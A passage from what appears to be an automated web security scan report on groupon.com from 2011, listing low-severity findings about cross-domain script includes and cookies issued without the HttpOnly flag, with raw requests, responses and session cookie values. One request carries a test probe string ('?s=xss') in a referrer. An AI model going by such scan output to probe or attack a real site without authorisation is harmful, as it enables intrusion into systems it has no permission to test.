HTTP/1.1 200 OK-00505695132f; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:54:04 GMT-00505695132f; domain=.groupon.com; path=/a465d2f3049f987a77dc85; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:54:04 GMT; HttpOnly77d3d62064ebb"/xhtml1/DTD/xhtml1-transitional.dtd">.facebook.com/2008/fbml' xmlns='http://www...[SNIP]... <script src="http://www.googleadservices.com/pagead/conversion.js" type="text/javascript"> </script>...[SNIP]... <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js" type="text/javascript"> </script><script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/assets/subscriptions-wVnbKY7b.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/jquery.sha256-MHjUM5vi.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/jquery.md5-Oz7bVl92.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/attribute_reader-RS-sBH34.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/cookie-5t3UUKHC.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch_init-ttb07SXy.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/finch-jDC2a2wA.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch-k4i_yjx3.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/app/subscriptions/multi_steps-opO74hi1.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/dev/jquery.validate-DEXiqLMx.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/app/subscriptions/alerts-IrgXe2LC.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/app/subscriptions/disable_on_submit--rDwJEm-.js" type="text/javascript"> </script>...[SNIP]...
5.19. http://www.groupon.com/users/forgot_password
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/users/forgot_password
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js http://assets1.grouponcdn.com/static/assets/application-h6awGMXN.js http://assets1.grouponcdn.com/static/assets/facebook-MKNbeh7E.js http://assets1.grouponcdn.com/static/javascripts/common/finch-jDC2a2wA.js http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch-k4i_yjx3.js http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch_init-ttb07SXy.js http://assets1.grouponcdn.com/static/javascripts/common/jquery.md5-Oz7bVl92.js http://assets1.grouponcdn.com/static/javascripts/dev/jquery.validate-DEXiqLMx.js
Request
GET /users/forgot_password HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.9.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 200 OK-00505695132feda0ddd2bf450bd41f6b1f04; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:56:21 GMT-00505695132feda0ddd2da03e4f5110a34e8; domain=.groupon.com; path=/1f5519ee0d9661c0bdf1fd; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:56:21 GMT; HttpOnly308885c322d7e".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]... <script src="http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch_init-ttb07SXy.js" type="text/javascript"> </script>...[SNIP]... <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js" type="text/javascript"> </script><script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/dev/jquery.validate-DEXiqLMx.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/jquery.md5-Oz7bVl92.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/finch-jDC2a2wA.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch-k4i_yjx3.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/assets/application-h6awGMXN.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/assets/facebook-MKNbeh7E.js" type="text/javascript"> </script>...[SNIP]...
5.20. http://www.groupon.com/users/send_password_reset
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/users/send_password_reset
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js http://assets1.grouponcdn.com/static/assets/application-h6awGMXN.js http://assets1.grouponcdn.com/static/assets/facebook-MKNbeh7E.js http://assets1.grouponcdn.com/static/javascripts/common/finch-jDC2a2wA.js http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch-k4i_yjx3.js http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch_init-ttb07SXy.js http://assets1.grouponcdn.com/static/javascripts/common/jquery.md5-Oz7bVl92.js http://assets1.grouponcdn.com/static/javascripts/dev/jquery.validate-DEXiqLMx.js
Request
POST /users/send_password_reset HTTP/1.1/users/forgot_password-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; _chartbeat2=e8v98moqfru8d0uh; _tpref=http%3A%2F%2Fwww.grouponworks.com%2F; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85; __utma=44473723.936981430.1313841222.1313841222.1313841222.1; __utmb=44473723.23.7.1313841295603; __utmc=44473723; __utmz=44473723.1313841222.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1_token=r1M203F0Ir4AsHf7OkBQViXsP4HUiV7QpXuxNGPWJbQ%3D&user%5Bemail_address%5D=test%40fastdial.net&commit=Submit
Response
HTTP/1.1 200 OK%40fastdial.net; path=/; expires=Fri, 20-Aug-2021 12:01:42 GMT-00505695132feda0ddd22df6c7a004d88bb; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 12:01:42 GMT-00505695132feda0ddd2773edf5e93a17927; domain=.groupon.com; path=/cd872c8cf0bdec825095aa; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 12:01:43 GMT; HttpOnlya29a9aadcf59d".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]... <script src="http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch_init-ttb07SXy.js" type="text/javascript"> </script>...[SNIP]... <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js" type="text/javascript"> </script><script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/dev/jquery.validate-DEXiqLMx.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/jquery.md5-Oz7bVl92.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/finch-jDC2a2wA.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch-k4i_yjx3.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/assets/application-h6awGMXN.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/assets/facebook-MKNbeh7E.js" type="text/javascript"> </script>...[SNIP]...
5.21. http://www.groupon.com/widget
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/widget
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js http://assets1.grouponcdn.com/static/assets/application-h6awGMXN.js http://assets1.grouponcdn.com/static/assets/facebook-MKNbeh7E.js http://assets1.grouponcdn.com/static/javascripts/common/colorpicker-_f6C2Gku.js http://assets1.grouponcdn.com/static/javascripts/common/finch-jDC2a2wA.js http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch-k4i_yjx3.js http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch_init-ttb07SXy.js http://assets1.grouponcdn.com/static/javascripts/common/jquery.md5-Oz7bVl92.js http://assets1.grouponcdn.com/static/javascripts/common/widget-fdGUO_gs.js http://assets1.grouponcdn.com/static/javascripts/dev/jquery.validate-DEXiqLMx.js http://assets1.grouponcdn.com/static/javascripts/views/doc/widget_builder-WNnNa--L.js
Request
GET /widget HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.936981430.1313841222.1313841222.1313841222.1; __utmb=44473723.4.10.1313841222; __utmc=44473723; __utmz=44473723.1313841222.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 200 OK-00505695132feda0ddd2de699e98101a66c5; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:58:52 GMTc27794; domain=.groupon.com; path=/7ace3326a1196bfa6f3e6a; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:58:53 GMT; HttpOnly8d9dcab7797d7".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]... <script src="http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch_init-ttb07SXy.js" type="text/javascript"> </script>...[SNIP]... <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js" type="text/javascript"> </script><script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/dev/jquery.validate-DEXiqLMx.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/jquery.md5-Oz7bVl92.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/finch-jDC2a2wA.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch-k4i_yjx3.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/assets/application-h6awGMXN.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/javascripts/common/widget-fdGUO_gs.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/colorpicker-_f6C2Gku.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/views/doc/widget_builder-WNnNa--L.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/assets/facebook-MKNbeh7E.js" type="text/javascript"> </script>...[SNIP]...
6. Cookie without HttpOnly flag set
previous
next
There are 21 instances of this issue:
Issue background
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
6.1. http://www.groupon.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:_tpref=http%3A%2F%2Fliveoffgroupon.com%2F; domain=.groupon.com; path=/; expires=Sat, 27-Aug-2011 12:00:16 GMT division=dallas; path=/; expires=Tue, 20-Sep-2011 12:00:16 GMT b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd21b34888624731607; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 12:00:16 GMT s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd2466decd454241042; domain=.groupon.com; path=/
Request
GET / HTTP/1.1//xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; _chartbeat2=e8v98moqfru8d0uh; _tpref=http%3A%2F%2Fhire.jobvite.com%2FCompanyJobs%2FCareers.aspx%3Fc%3DqcZ9VfwZ%26jvresize%3Dhttp%3A%2F%2Fwww.groupon.com%2Fpages%2Fgroupon-jobs-frameresize; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85; __utma=44473723.936981430.1313841222.1313841222.1313841222.1; __utmb=44473723.17.7.1313841243632; __utmc=44473723; __utmz=44473723.1313841222.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1
Response
HTTP/1.1 302 Moved TemporarilySet-Cookie: _tpref=http%3A%2F%2Fliveoffgroupon.com%2F; domain=.groupon.com; path=/; expires=Sat, 27-Aug-2011 12:00:16 GMT Set-Cookie: division=dallas; path=/; expires=Tue, 20-Sep-2011 12:00:16 GMT Set-Cookie: b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd21b34888624731607; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 12:00:16 GMT Set-Cookie: s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd2466decd454241042; domain=.groupon.com; path=/ 21726e6fb720f93a27ac9c; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 12:00:16 GMT; HttpOnly/dallas/.com/dallas/">redirected</a>.</body></html>
6.2. http://www.groupon.com/about
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/about
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:division=dallas; path=/; expires=Tue, 20-Sep-2011 11:57:49 GMT b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2543d031307d0cd65; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:57:49 GMT s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd21b1d474f398584c0; domain=.groupon.com; path=/
Request
GET /about HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.12.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 200 OKSet-Cookie: division=dallas; path=/; expires=Tue, 20-Sep-2011 11:57:49 GMT Set-Cookie: b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2543d031307d0cd65; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:57:49 GMT Set-Cookie: s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd21b1d474f398584c0; domain=.groupon.com; path=/ e7caebb143ba57b628ed99; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:57:49 GMT; HttpOnly86a9ef714ba9a".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]...
6.3. http://www.groupon.com/ch/getaways/subscriptions/new
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/ch/getaways/subscriptions/new
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:division=dallas; path=/; expires=Tue, 20-Sep-2011 11:56:19 GMT b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2bf450bd41f6b1f04; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:56:19 GMT s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd2da03e4f5110a34e8; domain=.groupon.com; path=/
Request
GET /ch/getaways/subscriptions/new HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.9.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 200 OKSet-Cookie: division=dallas; path=/; expires=Tue, 20-Sep-2011 11:56:19 GMT Set-Cookie: b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2bf450bd41f6b1f04; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:56:19 GMT Set-Cookie: s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd2da03e4f5110a34e8; domain=.groupon.com; path=/ 1f5519ee0d9661c0bdf1fd; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:56:20 GMT; HttpOnly6dfb017a54bd4"/xhtml1/DTD/xhtml1-transitional.dtd">.facebook.com/2008/fbml' xmlns='http://www...[SNIP]...
6.4. http://www.groupon.com/dallas/all
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/dallas/all
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:division=dallas; path=/; expires=Tue, 20-Sep-2011 11:55:12 GMT b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2fb024e77223485b5; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:55:12 GMT s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd2efdc319c4bf28326; domain=.groupon.com; path=/
Request
GET /dallas/all HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.4.9.1313841158728; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|2=Exp-places-080311=Places1%2Fgroup2=1
Response
HTTP/1.1 200 OKSet-Cookie: division=dallas; path=/; expires=Tue, 20-Sep-2011 11:55:12 GMT Set-Cookie: b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2fb024e77223485b5; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:55:12 GMT Set-Cookie: s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd2efdc319c4bf28326; domain=.groupon.com; path=/ 092c69b1fcd789c8d410d4; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:55:13 GMT; HttpOnly72f5c10b6b19b".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]...
6.5. http://www.groupon.com/g-team
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/g-team
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:division=dallas; path=/; expires=Tue, 20-Sep-2011 11:57:39 GMT b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2543d031307d0cd65; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:57:39 GMT s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd21b1d474f398584c0; domain=.groupon.com; path=/
Request
GET /g-team HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.12.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 200 OKSet-Cookie: division=dallas; path=/; expires=Tue, 20-Sep-2011 11:57:39 GMT Set-Cookie: b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2543d031307d0cd65; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:57:39 GMT Set-Cookie: s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd21b1d474f398584c0; domain=.groupon.com; path=/ e7caebb143ba57b628ed99; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:57:39 GMT; HttpOnly933a541c894bf".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]...
6.6. http://www.groupon.com/getaways
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/getaways
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:division=dallas; path=/; expires=Tue, 20-Sep-2011 11:55:49 GMT b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2b8d8f685eca64051; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:55:49 GMT s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd2c5f561564208c98f; domain=.groupon.com; path=/
Request
GET /getaways?d=travel_countmein HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.8.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 302 Moved TemporarilySet-Cookie: division=dallas; path=/; expires=Tue, 20-Sep-2011 11:55:49 GMT Set-Cookie: b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2b8d8f685eca64051; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:55:49 GMT Set-Cookie: s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd2c5f561564208c98f; domain=.groupon.com; path=/ 0b397e4511672da24cbaaa; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:55:49 GMT; HttpOnly/getaways/subscriptions/new.com/ch/getaways/subscriptions/new">redirected</a>.</body></html>
6.7. http://www.groupon.com/jobs
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/jobs
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:division=dallas; path=/; expires=Tue, 20-Sep-2011 11:58:39 GMT b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd290b2659c55b1fd6e; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:58:39 GMT s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd264a895d76ea2aaa; domain=.groupon.com; path=/
Request
GET /jobs HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85; __utma=44473723.936981430.1313841222.1313841222.1313841222.1; __utmb=44473723.4.10.1313841222; __utmc=44473723; __utmz=44473723.1313841222.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|2=Exp-places-080311=Places1%2Fgroup2=1
Response
HTTP/1.1 200 OKSet-Cookie: division=dallas; path=/; expires=Tue, 20-Sep-2011 11:58:39 GMT Set-Cookie: b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd290b2659c55b1fd6e; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:58:39 GMT Set-Cookie: s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd264a895d76ea2aaa; domain=.groupon.com; path=/ 5f6fb102a5df9007c0345e; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:58:39 GMT; HttpOnly42c8805768d14".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]...
6.8. http://www.groupon.com/learn
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/learn
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:_tpref=http%3A%2F%2Forigin.groublogpon.com%2F%3Fs%3Dxss; domain=.groupon.com; path=/; expires=Sat, 27-Aug-2011 12:02:51 GMT division=dallas; path=/; expires=Tue, 20-Sep-2011 12:02:51 GMT b=54035a9a-cb24-11e0-b2e0-005056926806; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 12:02:51 GMT s=54036166-cb24-11e0-b2e0-005056926806; domain=.groupon.com; path=/
Request
GET /learn HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7.com/?s=xss.340368620.1313841586.1313841586.1313841586.1; __utmb=172649589.4.10.1313841586; __utmc=172649589; __utmz=172649589.1313841586.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _chartbeat2=ts2s2t371e5yxuld
Response
HTTP/1.1 200 OKSet-Cookie: _tpref=http%3A%2F%2Forigin.groublogpon.com%2F%3Fs%3Dxss; domain=.groupon.com; path=/; expires=Sat, 27-Aug-2011 12:02:51 GMT Set-Cookie: division=dallas; path=/; expires=Tue, 20-Sep-2011 12:02:51 GMT Set-Cookie: b=54035a9a-cb24-11e0-b2e0-005056926806; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 12:02:51 GMT Set-Cookie: s=54036166-cb24-11e0-b2e0-005056926806; domain=.groupon.com; path=/ 4a090a3e7beda2398975ab; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 12:02:51 GMT; HttpOnly9250396ef13f8".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]...
6.9. http://www.groupon.com/merchants/welcome
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/merchants/welcome
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:_tpref=http%3A%2F%2Fwww.grouponworks.com%2F; domain=.groupon.com; path=/; expires=Sat, 27-Aug-2011 12:01:06 GMT division=dallas; path=/; expires=Tue, 20-Sep-2011 12:01:06 GMT b=e4d26f04-cb22-11e0-a02d-00505695132feda0ddd2e0d0571e3cf7eeb9; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 12:01:06 GMT s=e4d27710-cb22-11e0-a02d-00505695132feda0ddd2e7daddb9cb120594; domain=.groupon.com; path=/
Request
